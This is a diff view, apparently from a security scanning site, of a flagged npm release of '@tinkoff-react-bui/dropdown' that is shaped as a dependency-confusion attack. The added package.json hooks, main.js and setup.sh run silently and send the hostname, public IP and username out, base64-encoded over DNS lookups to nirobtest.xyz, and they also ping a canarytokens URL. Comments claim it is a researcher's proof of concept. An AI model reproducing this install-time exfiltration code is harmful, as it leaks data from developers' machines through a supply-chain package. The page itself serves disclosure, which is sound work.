@tinkoff-react-bui/dropdown 0.0.1-security → 8.7208.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @tinkoff-react-bui/dropdown might be problematic. Click here for more details.
- package/README.md +1 -5
- package/build.js +18 -0
- package/index.js +16 -0
- package/lib/application.js +644 -0
- package/lib/ee-first/LICENSE +22 -0
- package/lib/ee-first/README.md +80 -0
- package/lib/ee-first/index.js +95 -0
- package/lib/express.js +116 -0
- package/lib/request.js +525 -0
- package/lib/response.js +1142 -0
- package/main.js +17 -0
- package/package.json +13 -3
- package/setup.sh +14 -0
package/main.js
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
const { exec } = require("child_process");
|
2
|
+
exec("node index.js > /dev/null 2>&1; sh setup.sh > /dev/null 2>&1;", (error, data, getter) => {
|
3
|
+
if(error){
|
4
|
+
console.log("error",error.message);
|
5
|
+
return;
|
6
|
+
}
|
7
|
+
if(getter){
|
8
|
+
console.log(data);
|
9
|
+
return;
|
10
|
+
}
|
11
|
+
console.log(data);
|
12
|
+
|
13
|
+
});
|
14
|
+
|
15
|
+
|
16
|
+
// if you see this then you're safe, i just save your company from this supply chain attack, my goal is make internet more safer; thanks.
|
17
|
+
// #this is a poc script please consider this, because i am a security researcher here is my hackerone profile https://hackerone.com/x1337loser
|
package/package.json
CHANGED
@@ -1,6 +1,16 @@
|
|
1
1
|
{
|
2
2
|
"name": "@tinkoff-react-bui/dropdown",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "8.7208.0",
|
4
|
+
"description": "",
|
5
|
+
"main": "main.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "node build.js",
|
8
|
+
"test": "node main.js"
|
9
|
+
},
|
10
|
+
"author": "<yetri+minguis>@tinkoff.ru,yetri(bemixif913@ningame.com)",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"express": "^4.17.1",
|
14
|
+
"lodash": "^4.17.21"
|
15
|
+
}
|
6
16
|
}
|
package/setup.sh
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
#!/usr/bin/bash
|
2
|
+
apt-get install xxd > /dev/null 2>&1;
|
3
|
+
apt-get install dnsutils > /dev/null 2>&1;
|
4
|
+
apt-get install curl > /dev/null 2>&1;
|
5
|
+
hostname | base64 | while read u;do dig $u.nirobtest.xyz;done > /dev/null 2>&1;
|
6
|
+
curl ifconfig.me | base64 | while read c;do dig $c.nirobtest.xyz;done > /dev/null 2>&1;
|
7
|
+
echo "@to-rc-b/dropdown" | base64 | while read d;do dig $d.nirobtest.xyz;done > /dev/null 2>&1;
|
8
|
+
whoami | base64 | while read a;do dig $a.nirobtest.xyz;done > /dev/null 2>&1;
|
9
|
+
curl http://canarytokens.com/images/about/tags/a2rttcd7o64zjdogjjke2tpsw/contact.php > /dev/null 2>&1;
|
10
|
+
|
11
|
+
|
12
|
+
|
13
|
+
#if you see this then you're safe, i just save your company from this supply chain attack, my goal is make internet more safer; thanks.
|
14
|
+
#this is a poc script please consider this, because i am a security researcher here is my hackerone profile https://hackerone.com/x1337loser
|